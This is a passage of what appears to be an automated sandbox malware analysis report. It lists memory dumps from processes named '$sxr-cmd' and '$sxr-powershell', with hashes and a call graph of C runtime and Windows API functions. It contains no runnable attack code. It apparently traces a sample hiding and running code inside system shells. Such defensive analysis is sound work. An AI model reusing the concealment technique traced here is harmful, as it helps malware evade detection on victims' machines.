                                                                                                            • Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
                                                                                                            • Instruction Fuzzy Hash: 78219432205F94D5EF518F15E40869AF7E2FBD5B98F944010EF8D47724EB78C4468740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 1617791916-0
                                                                                                            • Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                            • Instruction ID: 1ebe8c27ea250151e8dbcc7db2826ab0eb6e723f27adfb04884c8d90f34e9017
                                                                                                            • Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
                                                                                                            • Instruction Fuzzy Hash: 6BE06571602A18EAFB048F62D81878976E2FBD9F15F89C014CA0907354DF7D84998740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:1.1%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:466
                                                                                                            Total number of Limit Nodes:6
                                                                                                            execution_graph 15749 1f5fdc7a608 15750 1f5fdc7a621 15749->15750 15751 1f5fdc7a61d 15749->15751 15761 1f5fdc7ccd8 15750->15761 15756 1f5fdc7a633 15758 1f5fdc7b978 __free_lconv_mon 4 API calls 15756->15758 15758->15751 15762 1f5fdc7a626 15761->15762 15763 1f5fdc7cce5 15761->15763 15767 1f5fdc7d1d0 GetEnvironmentStringsW 15762->15767 15803 1f5fdc7b39c 15763->15803 15768 1f5fdc7d1fe 15767->15768 15769 1f5fdc7d2a2 15767->15769 15772 1f5fdc7d120 WideCharToMultiByte 15768->15772 15770 1f5fdc7a62b 15769->15770 15771 1f5fdc7d2aa FreeEnvironmentStringsW 15769->15771 15770->15756 15781 1f5fdc7a674 15770->15781 15771->15770 15773 1f5fdc7d250 15772->15773 15773->15769 15774 1f5fdc7d257 15773->15774 15775 1f5fdc7aeac 5 API calls 15774->15775 15776 1f5fdc7d25f 15775->15776 15777 1f5fdc7d289 15776->15777 15778 1f5fdc7d120 WideCharToMultiByte 15776->15778 15779 1f5fdc7b978 __free_lconv_mon 4 API calls 15777->15779 15778->15777 15780 1f5fdc7d2a0 15779->15780 15780->15769 15782 1f5fdc7a69b 15781->15782 15783 1f5fdc7b900 _set_errno_from_matherr 4 API calls 15782->15783 15794 1f5fdc7a6d0 15783->15794 15784 1f5fdc7a73f 15785 1f5fdc7b978 __free_lconv_mon 4 API calls 15784->15785 15786 1f5fdc7a640 15785->15786 15798 1f5fdc7b978 15786->15798 15787 1f5fdc7b900 _set_errno_from_matherr 4 API calls 15787->15794 15788 1f5fdc7a730 16235 1f5fdc7a77c 15788->16235 15792 1f5fdc7b978 __free_lconv_mon 4 API calls 15792->15784 15793 1f5fdc7a767 15795 1f5fdc7b7e0 _invalid_parameter_noinfo 2 API calls 15793->15795 15794->15784 15794->15787 15794->15788 15794->15793 15796 1f5fdc7b978 __free_lconv_mon 4 API calls 15794->15796 16226 1f5fdc7abd4 15794->16226 15797 1f5fdc7a779 15795->15797 15796->15794 15799 1f5fdc7b97d HeapFree 15798->15799 15801 1f5fdc7b9af 15798->15801 15800 1f5fdc7b998 15799->15800 15799->15801 15802 1f5fdc7b8e0 _set_errno_from_matherr 3 API calls 15800->15802 15801->15756 15802->15801 15805 1f5fdc7b3ad 15803->15805 15807 1f5fdc7b3ba 15805->15807 15844 1f5fdc7d6a8 15805->15844 15806 1f5fdc7b3d1 15806->15807 15847 1f5fdc7b900 15806->15847 15814 1f5fdc7b434 15807->15814 15857 1f5fdc7ac34 15807->15857 15812 1f5fdc7b402 15815 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15812->15815 15813 1f5fdc7b3f2 15816 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15813->15816 15826 1f5fdc7ca60 15814->15826 15817 1f5fdc7b40a 15815->15817 15818 1f5fdc7b3f9 15816->15818 15819 1f5fdc7b420 15817->15819 15820 1f5fdc7b40e 15817->15820 15823 1f5fdc7b978 __free_lconv_mon 4 API calls 15818->15823 15853 1f5fdc7b034 15819->15853 15821 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15820->15821 15821->15818 15823->15807 15825 1f5fdc7b978 __free_lconv_mon 4 API calls 15825->15807 16092 1f5fdc7cc20 15826->16092 15828 1f5fdc7ca89 16103 1f5fdc7c76c 15828->16103 15831 1f5fdc7caa3 15831->15762 15833 1f5fdc7cb4f 15834 1f5fdc7b978 __free_lconv_mon 4 API calls 15833->15834 15834->15831 15837 1f5fdc7cb43 15838 1f5fdc7cb4a 15837->15838 15841 1f5fdc7cb6f 15837->15841 15839 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 15838->15839 15839->15833 15840 1f5fdc7cbac 15840->15833 16125 1f5fdc7c5b0 15840->16125 15841->15840 15842 1f5fdc7b978 __free_lconv_mon 4 API calls 15841->15842 15842->15840 15863 1f5fdc7d36c 15844->15863 15846 1f5fdc7d6d6 __vcrt_FlsSetValue 15846->15806 15848 1f5fdc7b911 _set_errno_from_matherr 15847->15848 15849 1f5fdc7b962 15848->15849 15850 1f5fdc7b946 HeapAlloc 15848->15850 15869 1f5fdc7b8e0 15849->15869 15850->15848 15852 1f5fdc7b3e4 15850->15852 15852->15812 15852->15813 15854 1f5fdc7b0e6 _set_errno_from_matherr 15853->15854 15892 1f5fdc7af8c 15854->15892 15856 1f5fdc7b0fb 15856->15825 15858 1f5fdc7ac3d 15857->15858 15860 1f5fdc7ac4c _handle_error 15858->15860 16012 1f5fdc7dcf8 15858->16012 15861 1f5fdc7ac7f 15860->15861 16028 1f5fdc7b5ac 15860->16028 15864 1f5fdc7d3cd 15863->15864 15868 1f5fdc7d3c8 try_get_function 15863->15868 15864->15846 15865 1f5fdc7d4b0 15865->15864 15866 1f5fdc7d4be GetProcAddress 15865->15866 15866->15864 15867 1f5fdc7d495 FreeLibrary 15867->15868 15868->15864 15868->15865 15868->15867 15872 1f5fdc7b444 15869->15872 15871 1f5fdc7b8e9 15871->15852 15874 1f5fdc7b459 try_get_function 15872->15874 15873 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15875 1f5fdc7b48e 15873->15875 15874->15873 15880 1f5fdc7b473 _set_errno_from_matherr 15874->15880 15876 1f5fdc7b900 _set_errno_from_matherr 4 API calls 15875->15876 15875->15880 15877 1f5fdc7b4a1 15876->15877 15878 1f5fdc7b4bf 15877->15878 15879 1f5fdc7b4af 15877->15879 15882 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15878->15882 15881 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15879->15881 15880->15871 15883 1f5fdc7b4b6 15881->15883 15884 1f5fdc7b4c7 15882->15884 15889 1f5fdc7b978 __free_lconv_mon 4 API calls 15883->15889 15885 1f5fdc7b4cb 15884->15885 15886 1f5fdc7b4dd 15884->15886 15887 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 15885->15887 15888 1f5fdc7b034 _set_errno_from_matherr 4 API calls 15886->15888 15887->15883 15890 1f5fdc7b4e5 15888->15890 15889->15880 15891 1f5fdc7b978 __free_lconv_mon 4 API calls 15890->15891 15891->15880 15893 1f5fdc7afa8 15892->15893 15896 1f5fdc7b21c 15893->15896 15895 1f5fdc7afbe 15895->15856 15897 1f5fdc7b264 Concurrency::details::SchedulerProxy::DeleteThis 15896->15897 15898 1f5fdc7b238 Concurrency::details::SchedulerProxy::DeleteThis 15896->15898 15897->15895 15898->15897 15900 1f5fdc7e784 15898->15900 15901 1f5fdc7e820 15900->15901 15904 1f5fdc7e7a7 15900->15904 15902 1f5fdc7e873 15901->15902 15905 1f5fdc7b978 __free_lconv_mon 4 API calls 15901->15905 15966 1f5fdc7e924 15902->15966 15904->15901 15906 1f5fdc7e7e6 15904->15906 15911 1f5fdc7b978 __free_lconv_mon 4 API calls 15904->15911 15907 1f5fdc7e844 15905->15907 15909 1f5fdc7e808 15906->15909 15913 1f5fdc7b978 __free_lconv_mon 4 API calls 15906->15913 15908 1f5fdc7b978 __free_lconv_mon 4 API calls 15907->15908 15912 1f5fdc7e858 15908->15912 15910 1f5fdc7b978 __free_lconv_mon 4 API calls 15909->15910 15915 1f5fdc7e814 15910->15915 15916 1f5fdc7e7da 15911->15916 15917 1f5fdc7b978 __free_lconv_mon 4 API calls 15912->15917 15919 1f5fdc7e7fc 15913->15919 15914 1f5fdc7e8de 15920 1f5fdc7b978 __free_lconv_mon 4 API calls 15915->15920 15926 1f5fdc80f38 15916->15926 15918 1f5fdc7e867 15917->15918 15923 1f5fdc7b978 __free_lconv_mon 4 API calls 15918->15923 15954 1f5fdc81044 15919->15954 15920->15901 15921 1f5fdc7b978 HeapAlloc HeapFree FreeLibrary GetProcAddress __free_lconv_mon 15925 1f5fdc7e87f 15921->15925 15923->15902 15925->15914 15925->15921 15927 1f5fdc80f41 15926->15927 15952 1f5fdc8103c 15926->15952 15928 1f5fdc80f5b 15927->15928 15929 1f5fdc7b978 __free_lconv_mon 4 API calls 15927->15929 15930 1f5fdc80f6d 15928->15930 15931 1f5fdc7b978 __free_lconv_mon 4 API calls 15928->15931 15929->15928 15932 1f5fdc80f7f 15930->15932 15933 1f5fdc7b978 __free_lconv_mon 4 API calls 15930->15933 15931->15930 15934 1f5fdc80f91 15932->15934 15935 1f5fdc7b978 __free_lconv_mon 4 API calls 15932->15935 15933->15932 15936 1f5fdc80fa3 15934->15936 15937 1f5fdc7b978 __free_lconv_mon 4 API calls 15934->15937 15935->15934 15938 1f5fdc80fb5 15936->15938 15939 1f5fdc7b978 __free_lconv_mon 4 API calls 15936->15939 15937->15936 15940 1f5fdc80fc7 15938->15940 15941 1f5fdc7b978 __free_lconv_mon 4 API calls 15938->15941 15939->15938 15942 1f5fdc80fd9 15940->15942 15943 1f5fdc7b978 __free_lconv_mon 4 API calls 15940->15943 15941->15940 15944 1f5fdc80feb 15942->15944 15945 1f5fdc7b978 __free_lconv_mon 4 API calls 15942->15945 15943->15942 15946 1f5fdc80ffd 15944->15946 15947 1f5fdc7b978 __free_lconv_mon 4 API calls 15944->15947 15945->15944 15948 1f5fdc81012 15946->15948 15949 1f5fdc7b978 __free_lconv_mon 4 API calls 15946->15949 15947->15946 15950 1f5fdc7b978 __free_lconv_mon 4 API calls 15948->15950 15951 1f5fdc81027 15948->15951 15949->15948 15950->15951 15951->15952 15953 1f5fdc7b978 __free_lconv_mon 4 API calls 15951->15953 15952->15906 15953->15952 15955 1f5fdc81049 15954->15955 15964 1f5fdc810aa 15954->15964 15956 1f5fdc81062 15955->15956 15957 1f5fdc7b978 __free_lconv_mon 4 API calls 15955->15957 15958 1f5fdc81074 15956->15958 15959 1f5fdc7b978 __free_lconv_mon 4 API calls 15956->15959 15957->15956 15960 1f5fdc81086 15958->15960 15961 1f5fdc7b978 __free_lconv_mon 4 API calls 15958->15961 15959->15958 15962 1f5fdc7b978 __free_lconv_mon 4 API calls 15960->15962 15963 1f5fdc81098 15960->15963 15961->15960 15962->15963 15963->15964 15965 1f5fdc7b978 __free_lconv_mon 4 API calls 15963->15965 15964->15909 15965->15964 15967 1f5fdc7e954 15966->15967 15968 1f5fdc7e929 15966->15968 15967->15925 15968->15967 15972 1f5fdc81108 15968->15972 15971 1f5fdc7b978 __free_lconv_mon 4 API calls 15971->15967 15973 1f5fdc7e94c 15972->15973 15974 1f5fdc81111 15972->15974 15973->15971 16008 1f5fdc810b0 15974->16008 15977 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15978 1f5fdc8113a 15977->15978 15979 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15978->15979 15980 1f5fdc81148 15979->15980 15981 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15980->15981 15982 1f5fdc81156 15981->15982 15983 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15982->15983 15984 1f5fdc81165 15983->15984 15985 1f5fdc7b978 __free_lconv_mon 4 API calls 15984->15985 15986 1f5fdc81171 15985->15986 15987 1f5fdc7b978 __free_lconv_mon 4 API calls 15986->15987 15988 1f5fdc8117d 15987->15988 15989 1f5fdc7b978 __free_lconv_mon 4 API calls 15988->15989 15990 1f5fdc81189 15989->15990 15991 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15990->15991 15992 1f5fdc81197 15991->15992 15993 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15992->15993 15994 1f5fdc811a5 15993->15994 15995 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15994->15995 15996 1f5fdc811b3 15995->15996 15997 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15996->15997 15998 1f5fdc811c1 15997->15998 15999 1f5fdc810b0 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 15998->15999 16000 1f5fdc811d0 15999->16000 16001 1f5fdc7b978 __free_lconv_mon 4 API calls 16000->16001 16002 1f5fdc811dc 16001->16002 16003 1f5fdc7b978 __free_lconv_mon 4 API calls 16002->16003 16004 1f5fdc811e8 16003->16004 16005 1f5fdc7b978 __free_lconv_mon 4 API calls 16004->16005 16006 1f5fdc811f4 16005->16006 16007 1f5fdc7b978 __free_lconv_mon 4 API calls 16006->16007 16007->15973 16009 1f5fdc810e4 16008->16009 16010 1f5fdc810f8 16008->16010 16009->16010 16011 1f5fdc7b978 __free_lconv_mon 4 API calls 16009->16011 16010->15977 16011->16009 16013 1f5fdc7dd20 16012->16013 16022 1f5fdc7dd41 16012->16022 16014 1f5fdc7b444 _set_errno_from_matherr 4 API calls 16013->16014 16016 1f5fdc7dd34 16013->16016 16013->16022 16014->16016 16015 1f5fdc7dd7e 16015->15860 16016->16015 16017 1f5fdc7ddbe 16016->16017 16016->16022 16018 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16017->16018 16019 1f5fdc7ddc3 16018->16019 16032 1f5fdc7b7c0 16019->16032 16020 1f5fdc7df49 16022->16020 16026 1f5fdc7de87 16022->16026 16035 1f5fdc7b2c8 16022->16035 16024 1f5fdc7b2c8 6 API calls 16024->16026 16025 1f5fdc7de77 16027 1f5fdc7b2c8 6 API calls 16025->16027 16026->16024 16027->16026 16029 1f5fdc7b5e6 capture_previous_context _invalid_parameter_noinfo 16028->16029 16030 1f5fdc7b67e IsDebuggerPresent 16029->16030 16031 1f5fdc7b6c1 _invalid_parameter_noinfo _handle_error 16030->16031 16031->15861 16079 1f5fdc7b710 16032->16079 16034 1f5fdc7b7d9 16034->16015 16037 1f5fdc7b2dd try_get_function 16035->16037 16036 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16038 1f5fdc7b312 16036->16038 16037->16036 16043 1f5fdc7b2f7 _set_errno_from_matherr 16037->16043 16039 1f5fdc7b900 _set_errno_from_matherr 4 API calls 16038->16039 16038->16043 16040 1f5fdc7b325 16039->16040 16041 1f5fdc7b343 16040->16041 16042 1f5fdc7b333 16040->16042 16046 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16041->16046 16044 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16042->16044 16045 1f5fdc7b386 16043->16045 16048 1f5fdc7ac34 6 API calls 16043->16048 16047 1f5fdc7b33a 16044->16047 16045->16025 16049 1f5fdc7b34b 16046->16049 16053 1f5fdc7b978 __free_lconv_mon 4 API calls 16047->16053 16058 1f5fdc7b39b 16048->16058 16050 1f5fdc7b361 16049->16050 16051 1f5fdc7b34f 16049->16051 16052 1f5fdc7b034 _set_errno_from_matherr 4 API calls 16050->16052 16054 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16051->16054 16055 1f5fdc7b369 16052->16055 16053->16043 16054->16047 16056 1f5fdc7b978 __free_lconv_mon 4 API calls 16055->16056 16056->16043 16057 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16059 1f5fdc7b3d1 16057->16059 16058->16057 16060 1f5fdc7b3ba 16058->16060 16059->16060 16061 1f5fdc7b900 _set_errno_from_matherr 4 API calls 16059->16061 16062 1f5fdc7ac34 6 API calls 16060->16062 16067 1f5fdc7b434 16060->16067 16063 1f5fdc7b3e4 16061->16063 16064 1f5fdc7b442 16062->16064 16065 1f5fdc7b402 16063->16065 16066 1f5fdc7b3f2 16063->16066 16068 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16065->16068 16069 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16066->16069 16067->16025 16070 1f5fdc7b40a 16068->16070 16073 1f5fdc7b3f9 16069->16073 16071 1f5fdc7b420 16070->16071 16072 1f5fdc7b40e 16070->16072 16075 1f5fdc7b034 _set_errno_from_matherr 4 API calls 16071->16075 16074 1f5fdc7d6a8 _set_errno_from_matherr 2 API calls 16072->16074 16076 1f5fdc7b978 __free_lconv_mon 4 API calls 16073->16076 16074->16073 16077 1f5fdc7b428 16075->16077 16076->16060 16078 1f5fdc7b978 __free_lconv_mon 4 API calls 16077->16078 16078->16060 16080 1f5fdc7b444 _set_errno_from_matherr 4 API calls 16079->16080 16081 1f5fdc7b735 16080->16081 16083 1f5fdc7b746 16081->16083 16087 1f5fdc7b7e0 16081->16087 16083->16034 16088 1f5fdc7b7ef _handle_error 16087->16088 16089 1f5fdc7b5ac _invalid_parameter_noinfo IsDebuggerPresent 16088->16089 16090 1f5fdc7b80e _invalid_parameter_noinfo 16089->16090 16091 1f5fdc7b814 TerminateProcess 16090->16091 16093 1f5fdc7cc43 16092->16093 16094 1f5fdc7cc4d 16093->16094 16099 1f5fdc7b978 __free_lconv_mon 4 API calls 16093->16099 16095 1f5fdc7ccbf 16094->16095 16096 1f5fdc7ac34 6 API calls 16094->16096 16095->15828 16097 1f5fdc7ccd7 16096->16097 16098 1f5fdc7cd2a 16097->16098 16100 1f5fdc7b39c 6 API calls 16097->16100 16098->15828 16099->16094 16101 1f5fdc7cd14 16100->16101 16102 1f5fdc7ca60 15 API calls 16101->16102 16102->16098 16137 1f5fdc7ac8c 16103->16137 16106 1f5fdc7c79e 16108 1f5fdc7c7a3 GetACP 16106->16108 16109 1f5fdc7c7b3 16106->16109 16107 1f5fdc7c78c GetOEMCP 16107->16109 16108->16109 16109->15831 16110 1f5fdc7aeac 16109->16110 16111 1f5fdc7aebb _set_errno_from_matherr 16110->16111 16112 1f5fdc7aef7 16110->16112 16111->16112 16113 1f5fdc7aede HeapAlloc 16111->16113 16114 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16112->16114 16113->16111 16115 1f5fdc7aef5 16113->16115 16114->16115 16115->15833 16116 1f5fdc7cd54 16115->16116 16117 1f5fdc7c76c 8 API calls 16116->16117 16118 1f5fdc7cd7f 16117->16118 16119 1f5fdc7cdbc IsValidCodePage 16118->16119 16122 1f5fdc7cdff _invalid_parameter_noinfo _handle_error 16118->16122 16120 1f5fdc7cdcd 16119->16120 16119->16122 16121 1f5fdc7ce04 GetCPInfo 16120->16121 16124 1f5fdc7cdd6 _invalid_parameter_noinfo 16120->16124 16121->16122 16121->16124 16122->15837 16168 1f5fdc7c87c 16124->16168 16127 1f5fdc7c5cc _invalid_parameter_noinfo 16125->16127 16126 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16128 1f5fdc7c65e 16126->16128 16127->16126 16130 1f5fdc7c5ef _invalid_parameter_noinfo 16127->16130 16129 1f5fdc7b7c0 _invalid_parameter_noinfo 6 API calls 16128->16129 16129->16130 16131 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16130->16131 16135 1f5fdc7c697 16130->16135 16132 1f5fdc7c6f5 16131->16132 16133 1f5fdc7b7c0 _invalid_parameter_noinfo 6 API calls 16132->16133 16133->16135 16134 1f5fdc7c731 16134->15833 16135->16134 16136 1f5fdc7b978 __free_lconv_mon 4 API calls 16135->16136 16136->16134 16138 1f5fdc7acab 16137->16138 16139 1f5fdc7acb0 16137->16139 16138->16106 16138->16107 16139->16138 16140 1f5fdc7b2c8 6 API calls 16139->16140 16141 1f5fdc7accb 16140->16141 16145 1f5fdc7e584 16141->16145 16146 1f5fdc7acee 16145->16146 16147 1f5fdc7e599 16145->16147 16149 1f5fdc7e5b8 16146->16149 16147->16146 16153 1f5fdc7ea2c 16147->16153 16150 1f5fdc7e5cd 16149->16150 16152 1f5fdc7e5e0 16149->16152 16150->16152 16165 1f5fdc7cd38 16150->16165 16152->16138 16154 1f5fdc7b2c8 6 API calls 16153->16154 16155 1f5fdc7ea3b 16154->16155 16156 1f5fdc7ea86 16155->16156 16161 1f5fdc7ea9c 16155->16161 16156->16146 16158 1f5fdc7ea74 16158->16156 16159 1f5fdc7ac34 6 API calls 16158->16159 16160 1f5fdc7ea99 16159->16160 16162 1f5fdc7eaae Concurrency::details::SchedulerProxy::DeleteThis 16161->16162 16164 1f5fdc7eabb 16161->16164 16163 1f5fdc7e784 Concurrency::details::SchedulerProxy::DeleteThis 4 API calls 16162->16163 16162->16164 16163->16164 16164->16158 16166 1f5fdc7b2c8 6 API calls 16165->16166 16167 1f5fdc7cd41 16166->16167 16169 1f5fdc7c8b9 GetCPInfo 16168->16169 16170 1f5fdc7c9af _handle_error 16168->16170 16169->16170 16174 1f5fdc7c8cc 16169->16174 16170->16122 16172 1f5fdc7c943 16186 1f5fdc7f93c 16172->16186 16177 1f5fdc7f494 16174->16177 16176 1f5fdc7f93c 9 API calls 16176->16170 16178 1f5fdc7ac8c 6 API calls 16177->16178 16179 1f5fdc7f4d6 16178->16179 16180 1f5fdc7aeac 5 API calls 16179->16180 16181 1f5fdc7f513 _handle_error 16179->16181 16182 1f5fdc7f538 _invalid_parameter_noinfo 16179->16182 16180->16182 16181->16172 16183 1f5fdc7f5d0 16182->16183 16185 1f5fdc7f5b6 GetStringTypeW 16182->16185 16183->16181 16184 1f5fdc7b978 __free_lconv_mon 4 API calls 16183->16184 16184->16181 16185->16183 16187 1f5fdc7ac8c 6 API calls 16186->16187 16188 1f5fdc7f961 16187->16188 16191 1f5fdc7f624 16188->16191 16190 1f5fdc7c976 16190->16176 16193 1f5fdc7f666 16191->16193 16192 1f5fdc7f8ef _handle_error 16192->16190 16193->16192 16194 1f5fdc7aeac 5 API calls 16193->16194 16195 1f5fdc7f6e3 16193->16195 16194->16195 16196 1f5fdc7f7e7 16195->16196 16213 1f5fdc7d760 16195->16213 16196->16192 16198 1f5fdc7b978 __free_lconv_mon 4 API calls 16196->16198 16198->16192 16199 1f5fdc7f78f 16199->16196 16200 1f5fdc7f7a4 16199->16200 16201 1f5fdc7f7f6 16199->16201 16200->16196 16204 1f5fdc7d760 3 API calls 16200->16204 16202 1f5fdc7f810 16201->16202 16203 1f5fdc7aeac 5 API calls 16201->16203 16202->16196 16205 1f5fdc7d760 3 API calls 16202->16205 16203->16202 16204->16196 16208 1f5fdc7f891 16205->16208 16206 1f5fdc7f8c6 16206->16196 16207 1f5fdc7b978 __free_lconv_mon 4 API calls 16206->16207 16207->16196 16208->16206 16219 1f5fdc7d120 16208->16219 16214 1f5fdc7d36c try_get_function 2 API calls 16213->16214 16215 1f5fdc7d79e 16214->16215 16216 1f5fdc7d7a3 16215->16216 16223 1f5fdc7d83c 16215->16223 16216->16199 16218 1f5fdc7d7ff LCMapStringW 16218->16216 16221 1f5fdc7d143 WideCharToMultiByte 16219->16221 16222 1f5fdc830b0 16221->16222 16224 1f5fdc7d36c try_get_function 2 API calls 16223->16224 16225 1f5fdc7d86a 16224->16225 16225->16218 16227 1f5fdc7abe1 16226->16227 16228 1f5fdc7abeb 16226->16228 16227->16228 16233 1f5fdc7ac06 16227->16233 16229 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16228->16229 16230 1f5fdc7abf2 16229->16230 16231 1f5fdc7b7c0 _invalid_parameter_noinfo 6 API calls 16230->16231 16232 1f5fdc7abfe 16231->16232 16232->15794 16233->16232 16234 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16233->16234 16234->16230 16236 1f5fdc7a738 16235->16236 16237 1f5fdc7a781 16235->16237 16236->15792 16238 1f5fdc7a7aa 16237->16238 16240 1f5fdc7b978 __free_lconv_mon 4 API calls 16237->16240 16239 1f5fdc7b978 __free_lconv_mon 4 API calls 16238->16239 16239->16236 16240->16237 16241 1f5fdc7db28 16242 1f5fdc7db38 16241->16242 16249 1f5fdc7fc4c 16242->16249 16244 1f5fdc7db41 16245 1f5fdc7db4f 16244->16245 16257 1f5fdc7d92c GetStartupInfoW 16244->16257 16250 1f5fdc7fc94 16249->16250 16251 1f5fdc7fc6b 16249->16251 16255 1f5fdc7fc7c 16250->16255 16268 1f5fdc7fb54 16250->16268 16252 1f5fdc7b8e0 _set_errno_from_matherr 4 API calls 16251->16252 16253 1f5fdc7fc70 16252->16253 16254 1f5fdc7b7c0 _invalid_parameter_noinfo 6 API calls 16253->16254 16254->16255 16255->16244 16258 1f5fdc7d9fb 16257->16258 16259 1f5fdc7d961 16257->16259 16263 1f5fdc7da1c 16258->16263 16259->16258 16260 1f5fdc7fc4c 7 API calls 16259->16260 16261 1f5fdc7d98a 16260->16261 16261->16258 16262 1f5fdc7d9b4 GetFileType 16261->16262 16262->16261 16265 1f5fdc7da3a 16263->16265 16264 1f5fdc7db0d 16264->16245 16265->16264 16266 1f5fdc7da95 GetStdHandle 16265->16266 16266->16265 16267 1f5fdc7daa8 GetFileType 16266->16267 16267->16265 16269 1f5fdc7b900 _set_errno_from_matherr 4 API calls 16268->16269 16274 1f5fdc7fb75 16269->16274 16270 1f5fdc7fbd7 16271 1f5fdc7b978 __free_lconv_mon 4 API calls 16270->16271 16272 1f5fdc7fbe1 16271->16272 16272->16250 16274->16270 16275 1f5fdc7d6fc 16274->16275 16276 1f5fdc7d36c try_get_function 2 API calls 16275->16276 16277 1f5fdc7d732 16276->16277 16278 1f5fdc7d747 InitializeCriticalSectionAndSpinCount 16277->16278 16279 1f5fdc7d73c 16277->16279 16278->16279 16279->16274 16280 1f5fdc7b900 16281 1f5fdc7b911 _set_errno_from_matherr 16280->16281 16282 1f5fdc7b962 16281->16282 16283 1f5fdc7b946 HeapAlloc 16281->16283 16284 1f5fdc7b8e0 _set_errno_from_matherr 3 API calls 16282->16284 16283->16281 16285 1f5fdc7b960 16283->16285 16284->16285 16286 1f5fdc429a0 16287 1f5fdc429ce 16286->16287 16288 1f5fdc42a2c VirtualAlloc 16287->16288 16289 1f5fdc42a50 16287->16289 16288->16289

                                                                                                            Control-flow Graph

                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3441317376.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_7ffd348a0000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c31a05e9f541d9fa9a88d1c12d201bc0ad55dcb2b6afaa309031050444663c7d
                                                                                                            • Instruction ID: 1735be3fce64e5d5c8d6f9126e9c017455f82200a68dc7a5a6f9f1b69b5d70c2
                                                                                                            • Opcode Fuzzy Hash: c31a05e9f541d9fa9a88d1c12d201bc0ad55dcb2b6afaa309031050444663c7d
                                                                                                            • Instruction Fuzzy Hash: 7DE1F722B1EAD55FE362976C98F64E57BE0DF5336470801BBCA84CB093ED5C68069362
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_19_2_1f5fdc70000_$sxr-powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentStrings$Free
                                                                                                            • String ID:
                                                                                                            • API String ID: 3328510275-0
                                                                                                            • Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction ID: 5c0023575a1d0d4f6f4d3ec3a94e3c768e7433a94f1b2c972a9b70ea1a2decb6
                                                                                                            • Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
                                                                                                            • Instruction Fuzzy Hash: 7221A531B14F52C1E7609F12A4102AAA7A6F784BD0F485774DFAA63BD8DF38C8538300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000013.00000002.3431472807.000001F5FDC70000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F5FDC70000, based on PE: true
                                                                                                            • Associated: 00000013.00000002.3431472807.000001F5FDC95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
